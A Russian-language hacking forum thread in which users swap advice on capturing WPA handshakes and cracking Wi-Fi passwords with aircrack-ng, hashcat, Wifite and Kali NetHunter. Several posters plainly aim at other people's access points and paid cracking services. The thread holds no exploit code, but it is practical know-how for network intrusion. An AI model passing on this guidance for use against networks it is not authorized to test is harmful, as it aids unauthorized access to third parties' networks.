но кроме моей сети шейки не ловит
binarymaster
05.03.2018, 23:16
↑ (https://antichat.live/posts/4190306/)
сигнал около 75-80дби
С таким-то сигналом до клиентов точки не дотянете, о хендшейке можно и не мечтать (если только передислоцироваться ближе к жертве на время атаки).
elektrochajnik
17.01.2019, 12:49
опытные подскажите..
скопилось несколько хендшейков не подаающихся хорошему словарю на 15 гб (супервпа+тлф)
в роздумиях тратить ли на них время .
Слышал что можно закинуть хендшейки на Гpuhash.ми . он определит взлавымаемый ли пароль за разумное время.
а потом если ответ положительный можно накинутся на хендшейк длинными словарями
так ли это ?
↑ (https://antichat.live/posts/4277833/)
опытные подскажите..
скопилось несколько хендшейков не подаающихся хорошему словарю на 15 гб (супервпа+тлф)
в роздумиях тратить ли на них время .
Слышал что можно закинуть хендшейки на Гpuhash.ми . он определит взлавымаемый ли пароль за разумное время.
а потом если ответ положительный можно накинутся на хендшейк длинными словарями
так ли это ?
Я бы для начало выложил свои хш сюда /threads/435763/ (https://antichat.live/threads/435763/)
и только потом если результат будет отрицательный обращусь в платный раздел( если очень приспичит)
/threads/417617/ (https://antichat.live/threads/417617/)
Madzinga
03.02.2019, 03:51
Подскажите пожалуйста можно ли поймать ХШ со смартфона на андроиде и что для этого нужно? Заранее спс!
↑ (https://antichat.live/posts/4282025/)
Подскажите пожалуйста можно ли поймать ХШ со смартфона на андроиде и что для этого нужно? Заранее спс!
Только если чип смартфона поддерживает monitor mode.Таких девайсов не много.
↑ (https://antichat.live/posts/4282054/)
Только если чип смартфона поддерживает monitor mode
Где давно слышал, что вроде по OTG кто то подключал WiFi адаптер, ставил драйвера и все работало или такое не возможно?
BillyBons
03.02.2019, 14:39
↑ (https://antichat.live/posts/4282025/)
Подскажите пожалуйста можно ли поймать ХШ со смартфона на андроиде и что для этого нужно? Заранее спс!
Практически, например, так -
а)
Необходим подходящий смартфон/планшет, например, вот из этого списка - https://www.kali.org/kali-linux-nethunter/
б)
На смартфоне/планшете - необходима прошивка Kali Nethunter - https://www.offensive-security.com/kali-linux-nethunter-download/
в)
Не помешает OTG-кабель и внешний USB_адаптер для сниффинга (есть в темах на форуме).
Дальше запускаете Wifite, и пользуетесь.
AdolfDead
17.06.2019, 14:17
Всем доброго времени суток, нид хелп!!
Commview for wifi не находит одну из сетей вайфай, хотя если смотреть через wi-fi поиск сетей или через wi-fi телефона, отличо находит с хорошим сигналом.
binarymaster
17.06.2019, 18:52
↑ (https://antichat.live/posts/4313653/)
Commview for wifi
Выброси эту гадость и не запускай больше.
↑ (https://antichat.live/posts/4313653/)
если смотреть через wi-fi поиск сетей или через wi-fi телефона, отличо находит с хорошим сигналом
Лучше используй вкладку Wireless в Router Scan (https://antichat.live/threads/398971/) с возможностями беспроводного аудита.
qwertyman
24.10.2019, 16:46
handshake перехвачен успешно. aircrack находит ключ по словарю,но он не срабатывает.
kali 5.2.9, карта Ralink rt3290
aircrack 1.5.2
↑ (https://antichat.live/posts/4340628/)
handshake перехвачен успешно. aircrack находит ключ по словарю,но он не срабатывает.
kali 5.2.9, карта Ralink rt3290
aircrack 1.5.2
View attachment 8250 (https://antichat.live/attachments/8250/)
возможно в точке доступа включена фильтрация доступа по MAC адресам
qwertyman
24.10.2019, 16:55
↑ (https://antichat.live/posts/4340631/)
возможно в точке доступа включена фильтрация доступа по MAC адресам
врядли,на трех точках проверил
↑ (https://antichat.live/posts/4340632/)
врядли,на трех точках проверил
в смысле ?
qwertyman
24.10.2019, 18:36
↑ (https://antichat.live/posts/4340640/)
в смысле ?
три разные точки с разными ssid, по всем handshake ловится норм, aircrack по всем находит passphrase по словарю, но по факту не к одной найденый ключ не подходит.
wpa2 на всех
qwertyman
24.10.2019, 21:31
во всех трех случаях ключ обнаруживается +- в конце перебора, странно это. словарь кривой?
еще попробовал на известной мне точке,aircrack вообще другой ключ показал
↑ (https://antichat.live/posts/4340676/)
словарь кривой?
прям беда. пароль не найден, словарь закончился.
qwertyman
24.10.2019, 21:36
↑ (https://antichat.live/posts/4340677/)
прям беда. пароль не найден, словарь закончился.
96% же
почему закончился?
↑ (https://antichat.live/posts/4340678/)
96% же
почему закончился?
я говорю, беда. нет в словаре пароля. ищите в других словарях.
---------
все три нашлись на 96%? Совпадение? Не думаю!
Это у вас супер пробивной словарь. Он подходит к любым хендшейкам.
Находит пароли на 96%, но они не подходят потом к сетям.
qwertyman
24.10.2019, 22:47
↑ (https://antichat.live/posts/4340679/)
Находит пароли на 96%, но они не подходят потом к сетям.
а хде взять норм словари?
binarymaster
24.10.2019, 23:59
↑ (https://antichat.live/posts/4340678/)
почему закончился?
Вы видите фразу "KEY FOUND" в терминале? Я — нет.
↑ (https://antichat.live/posts/4340695/)
а хде взять норм словари?
/threads/281655/ (https://antichat.live/threads/281655/)
qwertyman
27.10.2019, 03:04
с большим словарем на 15gb,aircrack зависает через несколько секунд после старта.
Может из-за того что словарь находится на примонтированном rw диске с ntfs?
Последний образ BackTrack 2013 года. Чем современным можно заменить? Хорошо бы было новую статью на современный лад.
erwerr2321
28.10.2019, 18:48
↑ (https://antichat.live/posts/4341695/)
Последний образ BackTrack 2013 года. Чем современным можно заменить?
Например, https://www.kali.org/ (https://www.kali.org)это что касается BackTrack.
А так вообще набор Aircrack-ng (https://github.com/aircrack-ng/aircrack-ng) можно установить, практически, на любой linux дистрибутив.
BabaDook
28.10.2019, 19:10
↑ (https://antichat.live/posts/4341697/)
Например,
https://www.kali.org/ (https://www.kali.org)
это что касается BackTrack.
А так вообще набор
Aircrack-ng (https://github.com/aircrack-ng/aircrack-ng)
можно установить, практически, на любой linux дистрибутив.
Даже на винду можно
dart8888
04.02.2020, 21:41
Ключ (пароль) прописывает мой мак (телефона) в роутере? Или я херню спорол? ))
↑ (https://antichat.live/posts/4362080/)
Ключ (пароль) прописывает мой мак (телефона) в роутере? Или я херню спорол? ))
Прописывает.
dart8888
05.02.2020, 21:16
↑ (https://antichat.live/posts/4362314/)
Прописывает.
Разбрать пакет, выдрать мак "хозяина", инжектировать свой, и отправить .. Контролька имеется?
↑ (https://antichat.live/posts/4362325/)
Разбрать пакет, выдрать мак "хозяина", инжектировать свой, и отправить .. Контролька имеется?
Прочтите:
/threads/431691/ (https://antichat.live/threads/431691/)
Stalker_Admin
08.02.2020, 15:04
↑ (https://antichat.live/posts/4341147/)
с большим словарем на 15gb,aircrack зависает через несколько секунд после старта.
Может из-за того что словарь находится на примонтированном rw диске с ntfs?
Словарь, если мы говорим о высоком уровне, весит 100 Гб минимум + поправки на геопозицию точки.
Triton_Mgn
08.02.2020, 15:12
Словарь хочеть загрузится в оперативную память 15 гб. Если меньше - само собой будет сбой.
Лучше тогда маска.
Здрасте, хотел поинтересоваться, учитывая что сейчас есть с WIFI, телевизоры, жесткие диски, принтеры и камеры, как мне определить что я получаю хэндшейк от роутера а не от чего то выше перечисленного?
Наткнулся на такое, и честно не понимаю что за точка без имени, почти с одинаковым МАКом. Или в списке сканируемых точек это все отображаться не будет?
nynenado
28.03.2020, 16:51
↑ (https://antichat.live/posts/4373724/)
Здрасте, хотел поинтересоваться, учитывая что сейчас есть с WIFI, телевизоры, жесткие диски, принтеры и камеры, как мне определить что я получаю хэндшейк от роутера а не от чего то выше перечисленного?
Наткнулся на такое, и честно не понимаю что за точка без имени, почти с одинаковым МАКом. Или в списке сканируемых точек это все отображаться не будет?
View attachment 9319 (https://antichat.live/attachments/9319/)
хс - это рукопожатие устройств! Одобрение в общем. Не важно от куда он перехвачен. Схватил, акуленком обрезал, расшифровал, радуешься!
тд без названия - //threads/379055/ (https://antichat.live/threads/379055/)
https://antichat.com/threads/383442/
amanat242
28.03.2020, 21:42
честно не понимаю что за точка без имени
Это скрытая точка доступа.
↑ (https://antichat.live/posts/4374293/)
Не важно от куда он перехвачен
Мне надо точки доступа ломать а не допустим WIFI камеры или еще чего.
↑ (https://antichat.live/posts/4374397/)
честно не понимаю что за точка без имени
Это скрытая точка доступа.
Почему у них мак практически одинаковый у открытой точки и скрытой?
Turanchocks_
29.03.2020, 05:14
↑ (https://antichat.live/posts/4374436/)
Мне надо точки доступа ломать а не допустим WIFI камеры или еще чего.
Почему у них мак практически одинаковый у открытой точки и скрытой?
Практически - не считается.
Есть мнение, что это два устройства одного и тогоже админа. Просто ленивый мудак не счел нужным маки прописать. Тупо поменял одну букву или что там у Вас.
nynenado
29.03.2020, 12:33
↑ (https://antichat.live/posts/4374436/)
Мне надо точки доступа ломать а не допустим WIFI камеры или еще чего.
Почему у них мак практически одинаковый у открытой точки и скрытой?
Иди и практикуйся! Еще раз говорю, тебе надо хс.
↑ (https://antichat.live/posts/4374480/)
Иди и практикуйся! Еще раз говорю, тебе надо хс.
Без тебя разберусь, что мне надо, хэндшейк у меня есть, я должен быть уверен, что если обращусь в платный раздел, и заплачу деньги, то буду подключаться к роутеру а не к камере или принтеру.
VasiliyP
29.03.2020, 20:42
↑ (https://antichat.live/posts/4374583/)
я должен быть уверен, что если обращусь в платный раздел, и заплачу деньги, то буду подключаться к роутеру а не к камере или принтеру.
Выложите cap файл с probe response пакетом, может что-то и увидим.
У точек на вашем скриншоте уровни сигналов одинаковы, канал один на двоих, и МАС-и почти одинаковые. Всё это похоже на обычный роутер с гостевой сетью. Какой-то xiaomi, вероятно на чипе ralink
.SpoilerTarget" type="button">Spoiler
https://0x0.st/iM84.png
↑ (https://antichat.live/posts/4374701/)
Выложите cap файл с probe response пакетом, может что-то и увидим.
https://drive.google.com/file/d/1k9f00lRs0igmhisd3IFzCkeFcFAabyHa/view
Не знаю с probe response пакетом или нет, не сильно разбираюсь, в EWSA пишет Валидный - Да, без строки Нет данных.
VasiliyP
30.03.2020, 12:40
↑ (https://antichat.live/posts/4374837/)
https://drive.google.com/file/d/1k9f00lRs0igmhisd3IFzCkeFcFAabyHa/view
Не знаю с probe response пакетом или нет, не сильно разбираюсь, в EWSA пишет Валидный - Да, без строки Нет данных.
Это "Xiaomi MiWiFi R3" https://wikidevi.wi-cat.ru/Xiaomi_MiWiFi_3 , можете обращаться в платный раздел.
amanat242
30.03.2020, 15:27
Почему у них мак практически одинаковый у открытой точки и скрытой?
Если мак один и тот же, возможно несколько точек доступа на одном роутере поднято.
BadsniFF
28.06.2020, 12:23
Доброго дня, в общем ситуация:
имеется юсб свисток TL-wn727(с которого я собственно иногда вайдравлю), роутер TP-link wn841, с недавнего времени он его перестал видеть, (раньше прекрасно видел и подключался), хотя видимость почти прямая сразу за стеной, в айродампе отображается всегда так:
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH UPTIME WPS
14:CC:20:**:**:** -1 0 0 114 0 11 -1 WPA 0d 00:00:00 0.0
то есть даже хш никак не ловится не говоря уж о инъекции
собственно вопрос - это они там в настройках чет подкрутили? и можно ли как то победить его, может какие то дополнительные ключи прописать
eXtremer
03.07.2020, 13:44
Дорбый день,
Ребят, если WPS отключен и клиенты не подключаются какие другие способы получить "handshake" ? Пользуюсь Kali.
Спасибо.
erwerr2321
03.07.2020, 13:54
↑ (https://antichat.live/posts/4397750/)
Дорбый день,
Ребят, если WPS отключен и клиенты не подключаются какие другие способы получить "handshake" ? Пользуюсь Kali.
Спасибо.
почитайте, может так получится, кто знает
/threads/464369/ (https://antichat.live/threads/464369/)
eXtremer
03.07.2020, 15:21
↑ (https://antichat.live/posts/4397752/)
почитайте, может так получится, кто знает
/threads/464369/ (https://antichat.live/threads/464369/)
Спасибо, попробую.
А кто взламывал пароль к wi-fi с iPhone, если да то какой софт использовали ? Поделитесь навыками !
Stalker_Admin
04.09.2020, 23:26
↑ (https://antichat.live/posts/4412245/)
А кто взламывал пароль к wi-fi с iPhone, если да то какой софт использовали ? Поделитесь навыками !
FBI
↑ (https://antichat.live/posts/4412245/)
А кто взламывал пароль к wi-fi с iPhone, если да то какой софт использовали ? Поделитесь навыками !
Как взломать iPhone. Разбираем по шагам все варианты доступа к данным устройств с iOS (https://xakep.ru/2018/09/11/iphone-hack-guide/)
Мобильная криминалистика. Извлекаем данные из iOS-устройств и проводим их анализ (https://xakep.ru/2016/09/30/mobile-criminal/)
Не благодари.
Я имею ввиду осуществлять взлом точек доступа роутера с iPhone.
↑ (https://antichat.live/posts/4412265/)
FBI
А в таких службах многие и есть кто хакерил ! Но в итоге ловить себе подомных или клетка )))
Добра и мира! Столкнулся с такой проблемой на железе (Ryzen 3 3200G, Radeon RX-580) под управлением Win 10. hashcat (6.2) ни в какую не запускается ни через cmd ни через PowerShell. Прошу помощи и советов. Спасибо!https://sun9-25.userapi.com/impg/56guT_OczY-7zP7kFLtJvo4TvZ8Z6eG2KViYjw/njK5VrbfgBg.jpg?size=1122x795&quality=96&sign=6315295c59c6ba2e3691b2f9e96a9903&type=album https://sun9-22.userapi.com/impg/Z_7sp2CsocMs6UU_yz2ixF77Dh-kqj_cHvBdVg/IfD7NH471h4.jpg?size=973x776&quality=96&sign=cbabaca5938c7b7331606bbd1dc97f90&type=album
174region174
04.02.2022, 07:16
У тебя комп ругается на .exe файл. Возможно ты скачал не тот архив.
Скачай этот и распакуй.
https://hashcat.net/files/hashcat-6.2.5.7z
Я запускаю не через powershall. Делаю проще. Ну это я так считаю для себя.
В левом нижнем углу. Пуск, найти cmd Потом скопируй в папку с котом и запусти командную строку. Ну а дальше проверь hashcat.exe -I
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot